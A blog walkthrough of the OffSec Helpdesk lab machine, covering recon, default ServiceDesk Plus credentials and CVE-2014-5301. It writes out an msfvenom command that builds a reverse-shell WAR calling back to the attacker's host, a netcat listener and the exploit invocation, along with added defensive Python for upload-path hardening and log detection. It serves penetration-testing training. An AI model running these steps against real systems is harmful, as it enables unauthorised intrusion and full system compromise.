<Introduction>
Hey all, I wrote this detailed walk-through of the OffSec Proving Grounds Helpdesk vulnerable host. In this blog post, I delve into the steps from reconnaissance to post-exploitation, showcasing the tools and techniques used to exploit this vulnerable host.
<What’s Covered>
This walk-through covers the entire process from reconnaissance to post-exploitation. You'll learn how to perform:
Port Scanning
Service Enumeration
Directory Traversal
Arbitrary File Upload
By the end of this guide, you’ll have a clear understanding of how to approach and exploit similar vulnerable hosts.
If you find this content informative and you are interested in cybersecurity, please regularly check back on Cyb3r-S3c for new content. Also, for more free content please like and subscribe to the Cyb3r-0verwatch channel.
<OVERVIEW>
Helpdesk is a vulnerable host created by Offsec to allow users to practice ethical hacking techniques. This virtual machine is downloadable from VulnHub and also accessible from the OffSec Proving Grounds virtual training lab. Helpdesk is affected by several vulnerabilities, including:
Identification and Authentication Failures due to default credentials
Directory Traversal
Arbitrary File Upload
Security Misconfiguration due to ServiceDesk running as 'System'
<Recon: Enumerating What is Running>
First, I booted up the Helpdesk host, which was assigned an IP address as shown in the image above. The initial phase focused on information gathering using Nmap to identify open ports and services.
Nmap is one of the primary tools I use for initial information gathering. The following Nmap command was used to discover open ports and services on the target host:
-sS: Runs a TCP SYN (half-open, "stealth") scan.
-A: Performs an aggressive scan on the target. It combines port scanning with OS detection, version detection, and script scanning.
-p-: Scans all 65,535 ports.
-T4: Defines the timing template used for the scan.
<Recon: Analyzing the Results>
Analyzing the scan results, the open ports suggest that the vulnerable host is running Windows, with services such as Microsoft Windows SMB/NetBIOS/RDP and ManageEngine ServiceDesk Plus. Nmap detected the following open ports:
Port 135 (RPC): Remote Procedure Call service.
Port 139 (NetBIOS): Network Basic Input/Output System service.
Port 445 (SMB): Server Message Block protocol, used for file sharing.
Port 3389 (RDP): Remote Desktop Protocol.
Port 8080 (HTTP): Running ManageEngine ServiceDesk Plus.
Based on the OS detection, CPE values, and service banners, it was evident that the target is a Windows Server 2008 Standard machine. Specifically, this conclusion rested on:
The OS type detected by Nmap.
CPE (Common Platform Enumeration) values.
Service banners.
SMB script output suggesting Windows Server 2008 Standard.
After reviewing the results, the first service I focused on was port 8080, which appeared to be running ManageEngine ServiceDesk Plus.
I navigated to the web interface at http://10.10.10.10:8080 to do a little more information gathering. The ManageEngine ServiceDesk Plus login page was displayed once the page loaded, and reviewing it showed that version 7.6.0 was running.
<Recon: Investigating the Web Application>
Knowing that many commercial off-the-shelf (COTS) products ship with default credentials, I searched for the default login credentials for ServiceDesk Plus. Google revealed that the default credentials are 'administrator'/'administrator'.
Using the default credentials 'administrator'/'administrator' allowed me to log in to ServiceDesk Plus. This is an indication of a security misconfiguration, or identification and authentication failures, because the default credentials are still enabled and usable. I did not see much I could do by navigating through the web GUI.
<Exploitation: Exploit Search and Execution Failure>
searchsploit manageengine servicedesk plus 7.6.0
I decided to run the following Searchsploit command shown in the CLI to verify whether a ServiceDesk Plus exploit was available locally. The output showed a promising exploit that appeared to be a SQL injection attack.
searchsploit -m 11793
I ran the following Searchsploit command shown in the CLI. The output shows the link to the Exploit-DB page and where the script is located on Kali, and it also copies the script into your current directory, which in this case is the Downloads folder.
The exploit text file provides general information about the vulnerability, affected versions and platforms, severity, and the security researcher who reported it, to name a few items. The exploit file also provides a proof of concept for executing the SQL injection. It provides methods for a target host running Windows with MySQL, a target host running Windows with MSSQL, and a target host running Linux with MySQL.
I attempted to run the POC for Windows with MSSQL as shown in the address bar, but it failed. Based on the output, I validated that the target host is a Windows server running MySQL. Instead of attempting the other method for Windows hosts running MySQL, I decided to google for other options.
<Recon: A Search Renewed>
I googled “manageengine servicedesk plus 7.6.0 exploit” and Google showed a few possible exploits. I went ahead and reviewed the first result on the list.
When I clicked the link it brought me to the CVE-2014-5301 Python exploit script. A closer review confirmed that the script targets version 7.6.0 of the ServiceDesk Plus application, which matches the version running on the target host. The exploit script leverages a directory traversal vulnerability and includes a reference to CVE Details via a provided 'CVEdetails' URL for further information.
Further analysis of the script revealed instructions for creating a Msfvenom payload. It offers the option to generate a reverse TCP shell, allowing you to choose between a Meterpreter payload or a standard reverse TCP shell.
The script also provides instructions for starting a listener prior to executing the exploit script. For this demonstration I will use Netcat as my listener instead of Meterpreter.
Finally, the script provides the format necessary to execute it successfully: the target host IP, the target host port (in this case 8080), the username and password (in this case I will use the default administrator credentials I discovered initially), and the WAR file generated with Msfvenom. If you review the script, the author does a great job commenting on the different sections.
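The bug class the exploit script relies on is a file upload whose client-supplied name is joined onto a directory without sanitization, so '../' segments can place a WAR where a servlet container will deploy it. The following is an added example (not code from the page, the exploit script, or ServiceDesk Plus) that puts the vulnerable pattern beside a hardened version; the upload root and blocked extensions are assumptions for the demonstration.

```python
import posixpath
import urllib.parse

# Constructed upload root for the demonstration (an assumption, not a real
# ServiceDesk Plus or Tomcat path).
UPLOAD_ROOT = "/opt/app/uploads"
BLOCKED_EXT = (".war", ".jsp", ".jspx", ".jar")

def unsafe_upload_path(filename: str) -> str:
    """Vulnerable pattern: the client-supplied name is joined straight onto
    the upload root, so '../' segments walk out of the directory and a WAR
    can be written into a servlet container's auto-deploy folder."""
    return posixpath.normpath(posixpath.join(UPLOAD_ROOT, filename))

def is_contained(path: str) -> bool:
    """True when an already-resolved path lies under UPLOAD_ROOT."""
    return posixpath.commonpath([UPLOAD_ROOT, path]) == UPLOAD_ROOT

def safe_upload_path(filename: str) -> str:
    """Hardened version: decode percent-encoding, keep only the final path
    component, reject dot names, NUL bytes and deployable extensions, then
    re-check containment so a future edit cannot silently reopen the hole."""
    decoded = urllib.parse.unquote(filename)
    if "\x00" in decoded:
        raise ValueError("NUL byte in filename")
    # Treat both separator styles as directory separators (Windows target).
    base = decoded.replace("\\", "/").rsplit("/", 1)[-1]
    if base in ("", ".", ".."):
        raise ValueError(f"rejected filename: {filename!r}")
    if base.lower().endswith(BLOCKED_EXT):
        raise ValueError(f"rejected extension: {base!r}")
    full = posixpath.normpath(posixpath.join(UPLOAD_ROOT, base))
    if not is_contained(full):
        raise ValueError("path escapes upload root")
    return full

def upload_allowed(filename: str) -> bool:
    """Convenience wrapper: True if safe_upload_path accepts the name."""
    try:
        safe_upload_path(filename)
        return True
    except ValueError:
        return False

if __name__ == "__main__":
    evil = urllib.parse.unquote("..%2F..%2Ftomcat%2Fwebapps%2Frevshell.war")
    print("unsafe  ->", unsafe_upload_path(evil), "contained:", is_contained(unsafe_upload_path(evil)))
    print("safe    ->", safe_upload_path("quarterly-report.pdf"))
    print("allowed ->", upload_allowed(evil))
```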
<Exploitation: Gaining Access>
The first thing I did was copy the URL from the GitHub page, then run the following Wget command shown in the CLI to download the exploit script.
mv CVE-2014-5301.py sd_plus.py
I then ran the following command shown in the CLI to rename the exploit.
chmod 777 sd_plus.py
I ran the following 'chmod' command shown in the CLI to make the script executable.
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Kali IP> LPORT=<Listening Port> -f war > revshell.war
With the script downloaded, using the following Msfvenom command shown in the CLI, I generated the WAR file needed for the exploit to work.
nc -lvnp 1234
Using the following Netcat command shown in the CLI, I ran my Netcat listener to hopefully catch a shell from the target host.
python3 ./sd_plus.py <IP> <Port> administrator administrator revshell.war
With everything set, I ran the exploit as shown in the CLI. Based on the output, it looks like it at least attempted a session with the target host.
Looking at my Netcat listener, it looks like I caught a shell.
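From the defender's side, the sequence above leaves a recognizable trail in the web server's access log: an authenticated upload whose filename carries traversal sequences and a deployable extension, followed by a request to the newly deployed context. The following is an added example (not code from the page or from ServiceDesk Plus) that runs that detection over constructed log lines; the endpoint, parameter name and context path are assumptions.

```python
import re
import urllib.parse

# Constructed access-log sample (combined-log shape). Endpoint, parameter and
# context names are assumptions for the demo, not taken from the product.
SAMPLE_LOG = """\
10.10.10.20 - - [01/Jan/2024:10:00:01 +0000] "POST /servlet/Login HTTP/1.1" 302 0
10.10.10.21 - - [01/Jan/2024:10:00:04 +0000] "POST /upload?file=quarterly%20report.pdf HTTP/1.1" 200 88
10.10.10.20 - - [01/Jan/2024:10:00:05 +0000] "POST /upload?file=..%2F..%2Fwebapps%2Frevshell.war HTTP/1.1" 200 88
10.10.10.20 - - [01/Jan/2024:10:00:12 +0000] "GET /revshell/ HTTP/1.1" 200 0
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
TRAVERSAL_RE = re.compile(r"(?:^|[^\w.])\.\.(?:[\\/]|$)")
DEPLOYABLE_RE = re.compile(r"\.(?:war|jsp|jspx)$", re.IGNORECASE)

def decode_fully(value: str, rounds: int = 3) -> str:
    """Undo percent-encoding repeatedly so double-encoded '..%252F' is seen."""
    for _ in range(rounds):
        decoded = urllib.parse.unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan_log(text: str) -> list:
    """Alert on traversal sequences in the request target, on deployable
    artifacts (.war/.jsp) named in query parameters, and on a later GET from
    the same source to a context matching an uploaded WAR's base name."""
    alerts, war_contexts = [], {}
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        src, ts, method, target, _status = m.groups()
        decoded = decode_fully(target)
        parts = urllib.parse.urlsplit(decoded)
        reasons = []
        if TRAVERSAL_RE.search(decoded):
            reasons.append("path traversal")
        for _, val in urllib.parse.parse_qsl(parts.query, keep_blank_values=True):
            if DEPLOYABLE_RE.search(val):
                reasons.append("deployable artifact uploaded")
                ctx = val.replace("\\", "/").rsplit("/", 1)[-1].rsplit(".", 1)[0]
                war_contexts.setdefault(src, set()).add("/" + ctx + "/")
        if method == "GET" and parts.path in war_contexts.get(src, ()):
            reasons.append("access to context of uploaded WAR")
        if reasons:
            alerts.append({"src": src, "time": ts, "target": target, "reasons": reasons})
    return alerts
```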
<Post-Exploitation: I Am Root>
When I ran the 'whoami' command, it showed that I am the SYSTEM account.
I ran the following command shown in the CLI to change directories to the 'Users' folder, then the 'dir' command to see which user folders were available. The only user folder that interests me is the 'Administrator' folder.
I ran the following commands shown in the CLI to change directories to the 'Administrator' folder and see the contents. The root flag will more than likely be in the 'Desktop' folder.
I ran the following commands shown in the CLI to change directories to the 'Desktop' folder and see the contents. Looking at the output I can see the 'proof.txt' containing the root flag.
type proof.txt
I ran the following command shown in the CLI to read the 'proof.txt' contents. And with that, I have completed the vulnerable host.
<CONCLUSION>
To conclude this blog post, using a variety of techniques I was able to go from reconnaissance to gaining root privileges on Helpdesk. Performing these steps allowed me to gather the information needed to gain a foothold on the target host. Upon gaining access, there was no need to escalate my privileges because ServiceDesk was running as 'System'. This allowed me to easily obtain the flag from the 'proof.txt' file located in the Administrator's user folder.
Thank you for reading the OffSec Proving Grounds Helpdesk vulnerable host walkthrough. If you find this content informative and you are interested in cybersecurity, please regularly check back on the Cyb3r-S3c website for updates. Also, for more free content, please like and subscribe to the Cyb3r-0verwatch channel.
Signing off,
Pragmat1c_0n3